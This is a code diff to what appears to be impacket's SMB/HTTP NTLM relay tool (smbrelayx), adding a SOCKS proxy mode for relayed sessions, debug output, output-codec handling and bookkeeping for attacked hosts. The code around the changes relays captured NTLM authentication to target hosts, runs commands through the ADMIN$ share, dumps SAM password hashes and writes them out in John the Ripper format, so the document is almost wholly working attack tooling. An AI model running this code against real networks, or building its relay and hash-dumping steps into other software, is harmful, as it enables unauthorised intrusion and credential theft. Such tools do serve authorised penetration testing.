@@ -50,8 +50,10 @@ from impacket import version
 from impacket.dcerpc.v5 import nrpc
 from impacket.dcerpc.v5 import transport
 from impacket.dcerpc.v5.ndr import NULL
+from impacket.dcerpc.v5.rpcrt import DCERPCException
 from impacket.examples import logger
 from impacket.examples import serviceinstall
+from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
 from impacket.nt_errors import ERROR_MESSAGES
 from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
     STATUS_MORE_PROCESSING_REQUIRED
@@ -65,7 +67,6 @@ from impacket.smb3 import SMB3
 from impacket.smbconnection import SMBConnection
 from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
 from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
-from impacket.dcerpc.v5.rpcrt import DCERPCException
 
 try:
  from Crypto.Cipher import DES, AES, ARC4
@@ -76,6 +77,7 @@ except Exception:
 # Global Variables
 # This is the list of hosts that have been attacked already in case -one-shot was chosen
 ATTACKED_HOSTS = set()
+CODEC = sys.getdefaultencoding()
 
 class doAttack(Thread):
     def __init__(self, SMBClient, exeFile, command):
@@ -106,7 +108,7 @@ class doAttack(Thread):
             else:
                 ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
         else:
-            from secretsdump import RemoteOperations, SAMHashes
+            from impacket.examples.secretsdump import RemoteOperations, SAMHashes
             samHashes = None
             try:
                 # We have to add some flags just in case the original client did not
@@ -118,6 +120,9 @@ class doAttack(Thread):
                 remoteOps  = RemoteOperations(self.__SMBConnection, False)
                 remoteOps.enableRegistry()
             except Exception, e:
+                if logging.getLogger().level == logging.DEBUG:
+                    import traceback
+                    traceback.print_exc()
                 # Something wen't wrong, most probably we don't have access as admin. aborting
                 logging.error(str(e))
                 ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
@@ -129,7 +134,16 @@ class doAttack(Thread):
                     logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
                     self.__answerTMP = ''
                     self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
-                    print self.__answerTMP
+                    logging.debug('Raw answer %r' % self.__answerTMP)
+
+                    try:
+                        print self.__answerTMP.decode(CODEC)
+                    except UnicodeDecodeError, e:
+                        logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
+                                      'https://docs.python.org/2.4/lib/standard-encodings.html\nand then execute wmiexec.py '
+                                  'again with -codec and the corresponding codec')
+                        print self.__answerTMP
+
                     self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
                 else:
                     bootKey = remoteOps.getBootKey()
@@ -139,6 +153,9 @@ class doAttack(Thread):
                     samHashes.dump()
                     logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
             except Exception, e:
+                if logging.getLogger().level == logging.DEBUG:
+                    import traceback
+                    traceback.print_exc()
                 ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
                 logging.error(str(e))
             finally:
@@ -146,6 +163,11 @@ class doAttack(Thread):
                     samHashes.finish()
                 if remoteOps is not None:
                     remoteOps.finish()
+            try:
+                ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
+            except Exception, e:
+                logging.error(str(e))
+                pass
 
 
 class SMBClient(SMB):
@@ -297,8 +319,9 @@ class SMBClient(SMB):
             resp = dce.request(request)
             #resp.dump()
         except DCERPCException, e:
-            #import traceback
-            #print traceback.print_exc()
+            if logging.getLogger().level == logging.DEBUG:
+                import traceback
+                traceback.print_exc()
             logging.error(str(e))
             return e.get_error_code()
 
@@ -358,8 +381,9 @@ class SMBClient(SMB):
             try:
                 errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)    
             except:
-                #import traceback
-                #print traceback.print_exc()
+                if logging.getLogger().level == logging.DEBUG:
+                    import traceback
+                    traceback.print_exc()
                 raise
 
         return smb, errorCode
@@ -426,7 +450,7 @@ class SMBClient(SMB):
 class HTTPRelayServer(Thread):
     class HTTPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
         def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
-                     one_shot, returnStatus=STATUS_SUCCESS):
+                     one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
             self.target = target
             self.exeFile = exeFile
             self.command = command
@@ -434,6 +458,7 @@ class HTTPRelayServer(Thread):
             self.returnStatus = returnStatus
             self.outputFile = outputFile
             self.one_shot = one_shot
+            self.runSocks = runSocks
 
             SocketServer.TCPServer.__init__(self,server_address, RequestHandlerClass)
 
@@ -484,6 +509,11 @@ class HTTPRelayServer(Thread):
             self.send_header('Content-Length','0')
             self.end_headers()
 
+        def send_error(self, code, message=None):
+            if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
+                return self.do_GET()
+            return SimpleHTTPServer.SimpleHTTPRequestHandler.send_error(self,code,message)
+
         def do_GET(self):
             messageType = 0
             if self.headers.getheader('Authorization') is None:
@@ -505,6 +535,12 @@ class HTTPRelayServer(Thread):
                 else:
                     self.target = self.server.target
                 try:
+                    if self.client is not None:
+                        logging.error('Still performing an attack against %s' % self.client.get_remote_host())
+                        self.send_response(404)
+                        self.end_headers()
+                        return
+
                     self.client = SMBClient(self.target, extended_security = True)
                     self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
                     self.client.set_timeout(60)
@@ -551,9 +587,19 @@ class HTTPRelayServer(Thread):
                     # Target will be attacked, adding to the attacked set
                     # If the attack fails, the doAttack thread will be responsible of removing it from the set
                     global ATTACKED_HOSTS
-                    ATTACKED_HOSTS.add(self.target)
-                    clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
-                    clientThread.start()
+                    if self.target not in ATTACKED_HOSTS:
+                        ATTACKED_HOSTS.add(self.target)
+                        if self.server.runSocks is True:
+                            # Pass all the data to the socksplugins proxy
+                            activeConnections.put(
+                                (self.target, 445, authenticateMessage['user_name'], self.client, {'CHALLENGE_MESSAGE': self.challengeMessage}))
+                            logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
+                        else:
+                            clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
+                            self.client = None
+                            clientThread.start()
+                    else:
+                        logging.error('%s is being attacker at the moment, skipping.. ' % self.target)
 
                     # And answer 404 not found
                     self.send_response(404)
@@ -575,6 +621,7 @@ class HTTPRelayServer(Thread):
         self.mode = None
         self.outputFile = outputFile
         self.one_shot = False
+        self.runSocks = False
 
     def setTargets(self, target):
         self.target = target
@@ -585,6 +632,9 @@ class HTTPRelayServer(Thread):
     def setCommand(self, command):
         self.command = command
 
+    def setSocks(self, socks):
+        self.runSocks = socks
+
     def setReturnStatus(self, returnStatus):
         # Not implemented yet.
         pass
@@ -601,7 +651,7 @@ class HTTPRelayServer(Thread):
     def run(self):
         logging.info("Setting up HTTP Server")
         httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
-                                self.outputFile, self.one_shot)
+                                self.outputFile, self.one_shot, runSocks = self.runSocks)
         httpd.serve_forever()
 
 class SMBRelayServer(Thread):
@@ -618,6 +668,7 @@ class SMBRelayServer(Thread):
         self.returnStatus = STATUS_SUCCESS
         self.command = None
         self.one_shot = False
+        self.runSocks = False
 
         # Here we write a mini config for the server
         smbConfig = ConfigParser.ConfigParser()
@@ -855,13 +906,20 @@ class SMBRelayServer(Thread):
                     if self.server.getJTRdumpPath() != '':
                         writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                               self.server.getJTRdumpPath())
-                    del (smbData[self.target])
 
                     # Target will be attacked, adding to the attacked set
                     # If the attack fails, the doAttack thread will be responsible of removing it from the set
                     ATTACKED_HOSTS.add(self.target)
-                    clientThread = doAttack(smbClient,self.exeFile,self.command)
-                    clientThread.start()
+                    if self.runSocks is True:
+                        # Pass all the data to the socksplugins proxy
+                        activeConnections.put((self.target, 445, authenticateMessage['user_name'], smbClient, connData))
+                        logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
+                        del (smbData[self.target])
+                    else:
+                        del (smbData[self.target])
+                        clientThread = doAttack(smbClient,self.exeFile,self.command)
+                        clientThread.start()
+
 
                     # Now continue with the server
                 #############################################################
@@ -933,13 +991,20 @@ class SMBRelayServer(Thread):
                 if self.server.getJTRdumpPath() != '':
                     writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                           self.server.getJTRdumpPath())
-                # Remove the target server from our connection list, the work is done
-                del (smbData[self.target])
                 # Target will be attacked, adding to the attacked set
                 # If the attack fails, the doAttack thread will be responsible of removing it from the set
                 ATTACKED_HOSTS.add(self.target)
-                clientThread = doAttack(smbClient, self.exeFile, self.command)
-                clientThread.start()
+                if self.runSocks is True:
+                    # Pass all the data to the socksplugins proxy
+                    activeConnections.put((self.target, 445, smbClient, connData))
+                    logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
+                    # Remove the target server from our connection list, the work is done
+                    del (smbData[self.target])
+                else:
+                    # Remove the target server from our connection list, the work is done
+                    del (smbData[self.target])
+                    clientThread = doAttack(smbClient, self.exeFile, self.command)
+                    clientThread.start()
                 # Now continue with the server
 
 
@@ -984,6 +1049,9 @@ class SMBRelayServer(Thread):
     def setCommand(self, command):
         self.command = command
 
+    def setSocks(self, socks):
+        self.runSocks = socks
+
     def setReturnStatus(self, returnStatus):
         # Specifies return status after successful relayed authentication to return
         # to the connecting client. This comes useful when we don't want the connecting
@@ -1020,6 +1088,7 @@ if __name__ == '__main__':
                                      description="For every connection received, this module will try to SMB relay that "
                                                  " connection to the target system or the original client")
     parser.add_argument("--help", action="help", help='show this help message and exit')
+    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
     parser.add_argument('-h', action='store', metavar='HOST',
                         help='Host to relay the credentials to, if not it will relay it back to the client')
     parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
@@ -1030,8 +1099,15 @@ if __name__ == '__main__':
     parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
                         help='Command to execute on target system. If not specified, hashes will be dumped '
                              '(secretsdump.py must be in the same directory)')
+    parser.add_argument('-socks', action='store_true', default=False,
+                        help='Launch a SOCKS proxy for the connection relayed')
     parser.add_argument('-one-shot', action='store_true', default=False,
                         help='After successful authentication, only execute the attack once for each target')
+    parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
+                                                       '"%s"). If errors are detected, run chcp.com at the target, '
+                                                       'map the result with '
+                                                       'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
+                                                       'again with -codec and the corresponding codec ' % CODEC)
     parser.add_argument('-outputfile', action='store',
                         help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
     parser.add_argument('-machine-account', action='store', required=False,
@@ -1047,6 +1123,16 @@ if __name__ == '__main__':
        logging.error(str(e))
        sys.exit(1)
 
+    if options.codec is not None:
+        CODEC = options.codec
+
+    if options.debug is True:
+        logging.getLogger().setLevel(logging.DEBUG)
+    else:
+        logging.getLogger().setLevel(logging.INFO)
+        logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
+
+
     if options.h is not None:
         logging.info("Running in relay mode")
         mode = 'RELAY'
@@ -1060,11 +1146,22 @@ if __name__ == '__main__':
     Command = options.c
     returnStatus = options.s
 
+    threads = set()
+
+    if options.socks is True:
+        # Start a SOCKS proxy in the background
+        s1 = SOCKS()
+        socks_thread = Thread(target=s1.serve_forever)
+        socks_thread.daemon = True
+        socks_thread.start()
+        threads.add(socks_thread)
+
     for server in RELAY_SERVERS:
         s = server(options.outputfile)
         s.setTargets(targetSystem)
         s.setExeFile(exeFile)
         s.setCommand(Command)
+        s.setSocks(options.socks)
         s.setReturnStatus(returnStatus)
         s.setMode(mode, options.one_shot)
         if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
@@ -1074,6 +1171,7 @@ if __name__ == '__main__':
             sys.exit(1)
 
         s.start()
+        threads.add(s)
         
     print ""
     logging.info("Servers started, waiting for connections")
@@ -1081,6 +1179,11 @@ if __name__ == '__main__':
         try:
             sys.stdin.read()
         except KeyboardInterrupt:
+            logging.info('Quitting.. please wait')
+            if options.socks is True:
+                s1.shutdown()
+            for s in threads:
+                del(s)
             sys.exit(1)
         else:
             pass
